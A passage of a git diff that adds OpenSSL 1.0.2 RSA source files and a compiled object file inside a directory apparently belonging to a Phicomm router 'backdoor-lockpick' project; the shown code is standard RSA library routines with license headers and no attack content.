@@ -0,0 +1,107 @@
+/* crypto/rsa/rsa_depr.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NB: This file contains deprecated functions (compatibility wrappers to the
+ * "new" versions).
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+
+#ifdef OPENSSL_NO_DEPRECATED
+
+static void *dummy = &dummy;
+
+#else
+
+RSA *RSA_generate_key(int bits, unsigned long e_value,
+                      void (*callback) (int, int, void *), void *cb_arg)
+{
+    BN_GENCB cb;
+    int i;
+    RSA *rsa = RSA_new();
+    BIGNUM *e = BN_new();
+
+    if (!rsa || !e)
+        goto err;
+
+    /*
+     * The problem is when building with 8, 16, or 32 BN_ULONG, unsigned long
+     * can be larger
+     */
+    for (i = 0; i < (int)sizeof(unsigned long) * 8; i++) {
+        if (e_value & (1UL << i))
+            if (BN_set_bit(e, i) == 0)
+                goto err;
+    }
+
+    BN_GENCB_set_old(&cb, callback, cb_arg);
+
+    if (RSA_generate_key_ex(rsa, bits, e, &cb)) {
+        BN_free(e);
+        return rsa;
+    }
+ err:
+    if (e)
+        BN_free(e);
+    if (rsa)
+        RSA_free(rsa);
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_depr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_depr.o
new file mode 100644
index 0000000000000000000000000000000000000000..548d341a11e99c1ff314aededf85d2f2cbb01699
GIT binary patch
literal 2200
zcmbu9-D?v;5WqK0YyGI#C<+BXxQ8ea?U`7?s35sCX|EC$Y@-ER&r7=6P@9&^1zR8V
zAyhnS)n{J?pZx<=f*<&#h=Tg4AShN8>4Q*|I<vRiZqv()4s2%jcQZS4JDIzh&U7^d
z0z^oF93e|PK?&(^TCx+&Opx`Yh0L{XpVv?KxWDvMJ?=|AtGj>nzHG1IzA-A_;zP!C
z<BkZp8*VBbiB-Q~WRLrlX~TVXZ0eI!Fs7<bA@;hb_3k@+&BEi#e4;!ztGaIu_lMgT
zZehODU`$oZAAzy`Y}}a1ghPh=HRXQKxSyY=!XYd><2vCs!yO2#%neR{u^6%$5|tle
z%5@Ntj(zf~n1;%Rj1I3(r^$nrr}2#Y;mn{upbzS2b@K`7?(96IMzXnb(J8A3wGJ)X
z9y?HG+t`(TQ7yWEmxu8c32B5Cf`!-CeLPDV2&p0q!a~{PDH6DRk_09~fh{e~t8c>_
zq=0Yb&sZs4O6XQYT4}o(Oe^Y4V_J#aXwsGFwN<(juQYcn;|&j#cuI-tN+hYMNu@2R
zgp$f?e#8oem()mpF06O}An4n9<f7{3Q9<^W%Ng#1WYtQ@cyk@@Uv7}y-tv$Z*lv{S
zWOoE?8!Wu<TIm4b#}C)x$vXU49iFYj3w5|%hZDPGnL~8k*7D?JuWnwTMQU3PHAm<q
zF}pJ-l6uBG(bd(P?lb%JWF~Dgw<5hnlE+Q1O4KoP1qaD_o6;2rnRJ3N_Rus-j+GxV
z^TQ+Nd8=>{3Io~eDc0F_VE<n5<bcGn2ZHA%zFy)bi7OJnBk@*=-;=oP|4`!CN0Iln
z#5YJ><s9Y>XKqQf(&VUP<%m{tY)=mh%cd7C&7l(x(S|I?B3iCgB3gcIbd(l>6~`Q^
z!3?*v`{Mfx#j-YTkBw8?nIsxJfeyp1TcdO-=YLo##Nw>hPErCGium7qJI`0xsJFnv
z?@a=hEFpv-RrX8BTF{tBOkf-5J2|hN{0KVxNG;w2K6vK8#>XHQ&y2#7MdaTtL$F1D
zp$|z+cI_1oGW7913Jkwi%l<>K@8|I<*s_TG6D$V?y4J=|@c47Wk?Y#{LEwJ<d&T=F
z`h@+%SP?I{Uv5nGp69>MHO}}NpLk@oy#qw9b6CNRB>cEVf-~tC|Ap7jKR1j1wef!e
D6;~Zs

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_eay.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_eay.c
new file mode 100644
index 0000000..b147fff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_eay.c
@@ -0,0 +1,904 @@
+/* crypto/rsa/rsa_eay.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+
+#ifndef RSA_NULL
+
+static int RSA_eay_public_encrypt(int flen, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding);
+static int RSA_eay_private_encrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding);
+static int RSA_eay_public_decrypt(int flen, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding);
+static int RSA_eay_private_decrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding);
+static int RSA_eay_mod_exp(BIGNUM *r0, const BIGNUM *i, RSA *rsa,
+                           BN_CTX *ctx);
+static int RSA_eay_init(RSA *rsa);
+static int RSA_eay_finish(RSA *rsa);
+static RSA_METHOD rsa_pkcs1_eay_meth = {
+    "Eric Young's PKCS#1 RSA",
+    RSA_eay_public_encrypt,
+    RSA_eay_public_decrypt,     /* signature verification */
+    RSA_eay_private_encrypt,    /* signing */
+    RSA_eay_private_decrypt,
+    RSA_eay_mod_exp,
+    BN_mod_exp_mont,            /* XXX probably we should not use Montgomery
+                                 * if e == 3 */
+    RSA_eay_init,
+    RSA_eay_finish,
+    0,                          /* flags */
+    NULL,
+    0,                          /* rsa_sign */
+    0,                          /* rsa_verify */
+    NULL                        /* rsa_keygen */
+};
+
+const RSA_METHOD *RSA_PKCS1_SSLeay(void)
+{
+    return (&rsa_pkcs1_eay_meth);
+}
+
+static int RSA_eay_public_encrypt(int flen, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding)
+{
+    BIGNUM *f, *ret;
+    int i, j, k, num = 0, r = -1;
+    unsigned char *buf = NULL;
+    BN_CTX *ctx = NULL;
+
+    if (BN_num_bits(rsa->n) > OPENSSL_RSA_MAX_MODULUS_BITS) {
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT, RSA_R_MODULUS_TOO_LARGE);
+        return -1;
+    }
+
+    if (BN_ucmp(rsa->n, rsa->e) <= 0) {
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT, RSA_R_BAD_E_VALUE);
+        return -1;
+    }
+
+    /* for large moduli, enforce exponent limit */
+    if (BN_num_bits(rsa->n) > OPENSSL_RSA_SMALL_MODULUS_BITS) {
+        if (BN_num_bits(rsa->e) > OPENSSL_RSA_MAX_PUBEXP_BITS) {
+            RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT, RSA_R_BAD_E_VALUE);
+            return -1;
+        }
+    }
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    f = BN_CTX_get(ctx);
+    ret = BN_CTX_get(ctx);
+    num = BN_num_bytes(rsa->n);
+    buf = OPENSSL_malloc(num);
+    if (!f || !ret || !buf) {
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    switch (padding) {
+    case RSA_PKCS1_PADDING:
+        i = RSA_padding_add_PKCS1_type_2(buf, num, from, flen);
+        break;
+# ifndef OPENSSL_NO_SHA
+    case RSA_PKCS1_OAEP_PADDING:
+        i = RSA_padding_add_PKCS1_OAEP(buf, num, from, flen, NULL, 0);
+        break;
+# endif
+    case RSA_SSLV23_PADDING:
+        i = RSA_padding_add_SSLv23(buf, num, from, flen);
+        break;
+    case RSA_NO_PADDING:
+        i = RSA_padding_add_none(buf, num, from, flen);
+        break;
+    default:
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT, RSA_R_UNKNOWN_PADDING_TYPE);
+        goto err;
+    }
+    if (i <= 0)
+        goto err;
+
+    if (BN_bin2bn(buf, num, f) == NULL)
+        goto err;
+
+    if (BN_ucmp(f, rsa->n) >= 0) {
+        /* usually the padding functions would catch this */
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT,
+               RSA_R_DATA_TOO_LARGE_FOR_MODULUS);
+        goto err;
+    }
+
+    if (rsa->flags & RSA_FLAG_CACHE_PUBLIC)
+        if (!BN_MONT_CTX_set_locked
+            (&rsa->_method_mod_n, CRYPTO_LOCK_RSA, rsa->n, ctx))
+            goto err;
+
+    if (!rsa->meth->bn_mod_exp(ret, f, rsa->e, rsa->n, ctx,
+                               rsa->_method_mod_n))
+        goto err;
+
+    /*
+     * put in leading 0 bytes if the number is less than the length of the
+     * modulus
+     */
+    j = BN_num_bytes(ret);
+    i = BN_bn2bin(ret, &(to[num - j]));
+    for (k = 0; k < (num - i); k++)
+        to[k] = 0;
+
+    r = num;
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    if (buf != NULL) {
+        OPENSSL_cleanse(buf, num);
+        OPENSSL_free(buf);
+    }
+    return (r);
+}
+
+static BN_BLINDING *rsa_get_blinding(RSA *rsa, int *local, BN_CTX *ctx)
+{
+    BN_BLINDING *ret;
+    int got_write_lock = 0;
+    CRYPTO_THREADID cur;
+
+    CRYPTO_r_lock(CRYPTO_LOCK_RSA);
+
+    if (rsa->blinding == NULL) {
+        CRYPTO_r_unlock(CRYPTO_LOCK_RSA);
+        CRYPTO_w_lock(CRYPTO_LOCK_RSA);
+        got_write_lock = 1;
+
+        if (rsa->blinding == NULL)
+            rsa->blinding = RSA_setup_blinding(rsa, ctx);
+    }
+
+    ret = rsa->blinding;
+    if (ret == NULL)
+        goto err;
+
+    CRYPTO_THREADID_current(&cur);
+    if (!CRYPTO_THREADID_cmp(&cur, BN_BLINDING_thread_id(ret))) {
+        /* rsa->blinding is ours! */
+
+        *local = 1;
+    } else {
+        /* resort to rsa->mt_blinding instead */
+
+        /*
+         * instructs rsa_blinding_convert(), rsa_blinding_invert() that the
+         * BN_BLINDING is shared, meaning that accesses require locks, and
+         * that the blinding factor must be stored outside the BN_BLINDING
+         */
+        *local = 0;
+
+        if (rsa->mt_blinding == NULL) {
+            if (!got_write_lock) {
+                CRYPTO_r_unlock(CRYPTO_LOCK_RSA);
+                CRYPTO_w_lock(CRYPTO_LOCK_RSA);
+                got_write_lock = 1;
+            }
+
+            if (rsa->mt_blinding == NULL)
+                rsa->mt_blinding = RSA_setup_blinding(rsa, ctx);
+        }
+        ret = rsa->mt_blinding;
+    }
+
+ err:
+    if (got_write_lock)
+        CRYPTO_w_unlock(CRYPTO_LOCK_RSA);
+    else
+        CRYPTO_r_unlock(CRYPTO_LOCK_RSA);
+    return ret;
+}
+
+static int rsa_blinding_convert(BN_BLINDING *b, BIGNUM *f, BIGNUM *unblind,
+                                BN_CTX *ctx)
+{
+    if (unblind == NULL)
+        /*
+         * Local blinding: store the unblinding factor in BN_BLINDING.
+         */
+        return BN_BLINDING_convert_ex(f, NULL, b, ctx);
+    else {
+        /*
+         * Shared blinding: store the unblinding factor outside BN_BLINDING.
+         */
+        int ret;
+        CRYPTO_w_lock(CRYPTO_LOCK_RSA_BLINDING);
+        ret = BN_BLINDING_convert_ex(f, unblind, b, ctx);
+        CRYPTO_w_unlock(CRYPTO_LOCK_RSA_BLINDING);
+        return ret;
+    }
+}
+
+static int rsa_blinding_invert(BN_BLINDING *b, BIGNUM *f, BIGNUM *unblind,
+                               BN_CTX *ctx)
+{
+    /*
+     * For local blinding, unblind is set to NULL, and BN_BLINDING_invert_ex
+     * will use the unblinding factor stored in BN_BLINDING. If BN_BLINDING
+     * is shared between threads, unblind must be non-null:
+     * BN_BLINDING_invert_ex will then use the local unblinding factor, and
+     * will only read the modulus from BN_BLINDING. In both cases it's safe
+     * to access the blinding without a lock.
+     */
+    return BN_BLINDING_invert_ex(f, unblind, b, ctx);
+}
+
+/* signing */
+static int RSA_eay_private_encrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding)
+{
+    BIGNUM *f, *ret, *res;
+    int i, j, k, num = 0, r = -1;
+    unsigned char *buf = NULL;
+    BN_CTX *ctx = NULL;
+    int local_blinding = 0;
+    /*
+     * Used only if the blinding structure is shared. A non-NULL unblind
+     * instructs rsa_blinding_convert() and rsa_blinding_invert() to store
+     * the unblinding factor outside the blinding structure.
+     */
+    BIGNUM *unblind = NULL;
+    BN_BLINDING *blinding = NULL;
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    f = BN_CTX_get(ctx);
+    ret = BN_CTX_get(ctx);
+    num = BN_num_bytes(rsa->n);
+    buf = OPENSSL_malloc(num);
+    if (!f || !ret || !buf) {
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_ENCRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    switch (padding) {
+    case RSA_PKCS1_PADDING:
+        i = RSA_padding_add_PKCS1_type_1(buf, num, from, flen);
+        break;
+    case RSA_X931_PADDING:
+        i = RSA_padding_add_X931(buf, num, from, flen);
+        break;
+    case RSA_NO_PADDING:
+        i = RSA_padding_add_none(buf, num, from, flen);
+        break;
+    case RSA_SSLV23_PADDING:
+    default:
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_ENCRYPT, RSA_R_UNKNOWN_PADDING_TYPE);
+        goto err;
+    }
+    if (i <= 0)
+        goto err;
+
+    if (BN_bin2bn(buf, num, f) == NULL)
+        goto err;
+
+    if (BN_ucmp(f, rsa->n) >= 0) {
+        /* usually the padding functions would catch this */
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_ENCRYPT,
+               RSA_R_DATA_TOO_LARGE_FOR_MODULUS);
+        goto err;
+    }
+
+    if (!(rsa->flags & RSA_FLAG_NO_BLINDING)) {
+        blinding = rsa_get_blinding(rsa, &local_blinding, ctx);
+        if (blinding == NULL) {
+            RSAerr(RSA_F_RSA_EAY_PRIVATE_ENCRYPT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+    }
+
+    if (blinding != NULL) {
+        if (!local_blinding && ((unblind = BN_CTX_get(ctx)) == NULL)) {
+            RSAerr(RSA_F_RSA_EAY_PRIVATE_ENCRYPT, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (!rsa_blinding_convert(blinding, f, unblind, ctx))
+            goto err;
+    }
+
+    if ((rsa->flags & RSA_FLAG_EXT_PKEY) ||
+        ((rsa->p != NULL) &&
+         (rsa->q != NULL) &&
+         (rsa->dmp1 != NULL) && (rsa->dmq1 != NULL) && (rsa->iqmp != NULL))) {
+        if (!rsa->meth->rsa_mod_exp(ret, f, rsa, ctx))
+            goto err;
+    } else {
+        BIGNUM local_d;
+        BIGNUM *d = NULL;
+
+        if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+            BN_init(&local_d);
+            d = &local_d;
+            BN_with_flags(d, rsa->d, BN_FLG_CONSTTIME);
+        } else
+            d = rsa->d;
+
+        if (rsa->flags & RSA_FLAG_CACHE_PUBLIC)
+            if (!BN_MONT_CTX_set_locked
+                (&rsa->_method_mod_n, CRYPTO_LOCK_RSA, rsa->n, ctx))
+                goto err;
+
+        if (!rsa->meth->bn_mod_exp(ret, f, d, rsa->n, ctx,
+                                   rsa->_method_mod_n))
+            goto err;
+    }
+
+    if (blinding)
+        if (!rsa_blinding_invert(blinding, ret, unblind, ctx))
+            goto err;
+
+    if (padding == RSA_X931_PADDING) {
+        BN_sub(f, rsa->n, ret);
+        if (BN_cmp(ret, f) > 0)
+            res = f;
+        else
+            res = ret;
+    } else
+        res = ret;
+
+    /*
+     * put in leading 0 bytes if the number is less than the length of the
+     * modulus
+     */
+    j = BN_num_bytes(res);
+    i = BN_bn2bin(res, &(to[num - j]));
+    for (k = 0; k < (num - i); k++)
+        to[k] = 0;
+
+    r = num;
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    if (buf != NULL) {
+        OPENSSL_cleanse(buf, num);
+        OPENSSL_free(buf);
+    }
+    return (r);
+}
+
+static int RSA_eay_private_decrypt(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding)
+{
+    BIGNUM *f, *ret;
+    int j, num = 0, r = -1;
+    unsigned char *p;
+    unsigned char *buf = NULL;
+    BN_CTX *ctx = NULL;
+    int local_blinding = 0;
+    /*
+     * Used only if the blinding structure is shared. A non-NULL unblind
+     * instructs rsa_blinding_convert() and rsa_blinding_invert() to store
+     * the unblinding factor outside the blinding structure.
+     */
+    BIGNUM *unblind = NULL;
+    BN_BLINDING *blinding = NULL;
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    f = BN_CTX_get(ctx);
+    ret = BN_CTX_get(ctx);
+    num = BN_num_bytes(rsa->n);
+    buf = OPENSSL_malloc(num);
+    if (!f || !ret || !buf) {
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_DECRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /*
+     * This check was for equality but PGP does evil things and chops off the
+     * top '0' bytes
+     */
+    if (flen > num) {
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_DECRYPT,
+               RSA_R_DATA_GREATER_THAN_MOD_LEN);
+        goto err;
+    }
+
+    /* make data into a big number */
+    if (BN_bin2bn(from, (int)flen, f) == NULL)
+        goto err;
+
+    if (BN_ucmp(f, rsa->n) >= 0) {
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_DECRYPT,
+               RSA_R_DATA_TOO_LARGE_FOR_MODULUS);
+        goto err;
+    }
+
+    if (!(rsa->flags & RSA_FLAG_NO_BLINDING)) {
+        blinding = rsa_get_blinding(rsa, &local_blinding, ctx);
+        if (blinding == NULL) {
+            RSAerr(RSA_F_RSA_EAY_PRIVATE_DECRYPT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+    }
+
+    if (blinding != NULL) {
+        if (!local_blinding && ((unblind = BN_CTX_get(ctx)) == NULL)) {
+            RSAerr(RSA_F_RSA_EAY_PRIVATE_DECRYPT, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (!rsa_blinding_convert(blinding, f, unblind, ctx))
+            goto err;
+    }
+
+    /* do the decrypt */
+    if ((rsa->flags & RSA_FLAG_EXT_PKEY) ||
+        ((rsa->p != NULL) &&
+         (rsa->q != NULL) &&
+         (rsa->dmp1 != NULL) && (rsa->dmq1 != NULL) && (rsa->iqmp != NULL))) {
+        if (!rsa->meth->rsa_mod_exp(ret, f, rsa, ctx))
+            goto err;
+    } else {
+        BIGNUM local_d;
+        BIGNUM *d = NULL;
+
+        if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+            d = &local_d;
+            BN_with_flags(d, rsa->d, BN_FLG_CONSTTIME);
+        } else
+            d = rsa->d;
+
+        if (rsa->flags & RSA_FLAG_CACHE_PUBLIC)
+            if (!BN_MONT_CTX_set_locked
+                (&rsa->_method_mod_n, CRYPTO_LOCK_RSA, rsa->n, ctx))
+                goto err;
+        if (!rsa->meth->bn_mod_exp(ret, f, d, rsa->n, ctx,
+                                   rsa->_method_mod_n))
+            goto err;
+    }
+
+    if (blinding)
+        if (!rsa_blinding_invert(blinding, ret, unblind, ctx))
+            goto err;
+
+    p = buf;
+    j = BN_bn2bin(ret, p);      /* j is only used with no-padding mode */
+
+    switch (padding) {
+    case RSA_PKCS1_PADDING:
+        r = RSA_padding_check_PKCS1_type_2(to, num, buf, j, num);
+        break;
+# ifndef OPENSSL_NO_SHA
+    case RSA_PKCS1_OAEP_PADDING:
+        r = RSA_padding_check_PKCS1_OAEP(to, num, buf, j, num, NULL, 0);
+        break;
+# endif
+    case RSA_SSLV23_PADDING:
+        r = RSA_padding_check_SSLv23(to, num, buf, j, num);
+        break;
+    case RSA_NO_PADDING:
+        r = RSA_padding_check_none(to, num, buf, j, num);
+        break;
+    default:
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_DECRYPT, RSA_R_UNKNOWN_PADDING_TYPE);
+        goto err;
+    }
+    if (r < 0)
+        RSAerr(RSA_F_RSA_EAY_PRIVATE_DECRYPT, RSA_R_PADDING_CHECK_FAILED);
+
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    if (buf != NULL) {
+        OPENSSL_cleanse(buf, num);
+        OPENSSL_free(buf);
+    }
+    return (r);
+}
+
+/* signature verification */
+static int RSA_eay_public_decrypt(int flen, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding)
+{
+    BIGNUM *f, *ret;
+    int i, num = 0, r = -1;
+    unsigned char *p;
+    unsigned char *buf = NULL;
+    BN_CTX *ctx = NULL;
+
+    if (BN_num_bits(rsa->n) > OPENSSL_RSA_MAX_MODULUS_BITS) {
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_MODULUS_TOO_LARGE);
+        return -1;
+    }
+
+    if (BN_ucmp(rsa->n, rsa->e) <= 0) {
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_BAD_E_VALUE);
+        return -1;
+    }
+
+    /* for large moduli, enforce exponent limit */
+    if (BN_num_bits(rsa->n) > OPENSSL_RSA_SMALL_MODULUS_BITS) {
+        if (BN_num_bits(rsa->e) > OPENSSL_RSA_MAX_PUBEXP_BITS) {
+            RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_BAD_E_VALUE);
+            return -1;
+        }
+    }
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    f = BN_CTX_get(ctx);
+    ret = BN_CTX_get(ctx);
+    num = BN_num_bytes(rsa->n);
+    buf = OPENSSL_malloc(num);
+    if (!f || !ret || !buf) {
